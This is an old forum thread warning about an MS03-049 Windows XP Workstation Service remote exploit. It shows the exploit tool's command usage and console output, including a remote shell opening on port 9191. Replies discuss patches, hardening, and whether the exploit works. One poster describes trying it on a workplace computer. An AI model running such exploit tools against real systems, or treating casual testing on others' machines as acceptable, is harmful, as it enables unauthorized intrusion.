heads up guys XP Workstation Service Remote Exploit
Results 1 to 9 of 9

Thread: heads up guys XP Workstation Service Remote Exploit

  1. #1
    Senior Member st1mpy's Avatar
    Join Date
    Jun 2003
    Posts
    111

    heads up guys XP Workstation Service Remote Exploit

    there is an exploit floating arround for xp


    [code]
    d:\>rpc_wks_bo.exe

    WKS service remote exploit MS03-049 by fiNis (fiNis[at]bk[dot]ru), ver:0.1.1
    -------------------------------------------------------------------
    Usage: rpc_wks_bo.exe [-ht]
    -h <IP> : Target IP
    -t <Type> : Target type (-t0 for a list)

    d:\>rpc_wks_bo.exe -t0

    Possible targets are:
    ============================
    1) Window XP Pro + SP0 [Rus]
    2) Window XP Pro + SP1 [Rus]
    3) Crash all

    d:\>rpc_wks_bo.exe -h localhost -t1

    [+] Prepare exploit string
    [+] Sleep at 2s ...
    [+] Setting up IPC$ session...
    [+] IPC$ session setup successfully!
    [+] Sending exploit ...
    [+] Initialize WSAStartup - OK
    [+] Socket initialized - OK
    [+] Try connecting to localhost:9191 ...[*] Connected to shell at localhost:9191


    hope it helps guys
    Un Seen But Well Heard Of

  2. #2
    Senior Member
    Join Date
    Sep 2003
    Posts
    156
    thanks for the heads up....


    does this affect all version of XP or just the russian edition?
    t.e.k.n.o.

  3. #3
    Senior Member st1mpy's Avatar
    Join Date
    Jun 2003
    Posts
    111
    i dono that guys web page was up but now its offline he said the ver for english is coming out too but i dono hope ms does something about it
    Un Seen But Well Heard Of

  4. #4
    The Doctor Und3ertak3r's Avatar
    Join Date
    Apr 2002
    Posts
    2,743
    Not exactly new: But a very timely warning.. Good find and warning..

    The info is in the M$ knowledgebase Here
    The page has the links to the patches..
    Oh the page was last updated on the 19th of November.. first posted Nov 11th..

    Win XP users need to look at the updates associated with MS03-043


    My system is patched.. but the service is Off.

    It follows the std rules..

    1/ disable any un-neccessary or un-needed Services..
    2/ keep uptodate with the patches .. this is hard due to number of systems for some and the need for testing of patches..
    3/ prevent any ***** expert from changing your settings.. (any user on our work system faces dismissal if they enable ANY service.. (they have to hack their system to start with)



    Cheers
    "Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  5. #5
    Senior Member st1mpy's Avatar
    Join Date
    Jun 2003
    Posts
    111
    ehehe yeah not that new but still it exploits so yea patch it boyz i run 2k so np with me hehe
    Un Seen But Well Heard Of

  6. #6
    Junior Member
    Join Date
    Oct 2002
    Posts
    7
    First of all that code can never run. You need to run-time link the WKSSVC.dll function NetAddAlternateComputerName. Remember this is an undocumented function.
    Also it only works on FAT32. So the english version will have to wait.
    Read about it here:
    http://www.eeye.com/html/Research/Ad...D20031111.html
    But there is still much work to be done because the exploit is deep in the looging function which doesn't even get executed if you're default $ipc session on NTFS.
    By the way the code crashes my w2k box but only after I connect to it via $ipc session and admin password as opposed to no password. Meanwhile it doesn't crash my xp. I keep them both up to date as of last week.
    So sorry to say but the script kiddies will have to wait on this one. However the patch will probably fix the logging function so even if you find a way to execute it, this exploit will have a hard time spreading.

  7. #7
    Senior Member
    Join Date
    Feb 2002
    Posts
    500
    just FYI, I got a copy of this code that works on xp sp1 english. I think it was made for rus but it works here on the english version next to me.
    Ron Paul: Hope for America
    http://www.ronpaul2008.com/

  8. #8
    Junior Member
    Join Date
    Oct 2002
    Posts
    7
    FAT32 or NTFS file system? Did you compile it from source or got the executable from somewhere.

  9. #9
    Senior Member
    Join Date
    Feb 2002
    Posts
    500
    ntfs, it was pre-compiled exe, supprise, and i just happened to try it on our techroom computer at work. I definatly had write access to the drive, not sure about much else, didn't have too much time to play. Altough it did not work on another computer accross the room, not sure why...
    Ron Paul: Hope for America
    http://www.ronpaul2008.com/

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •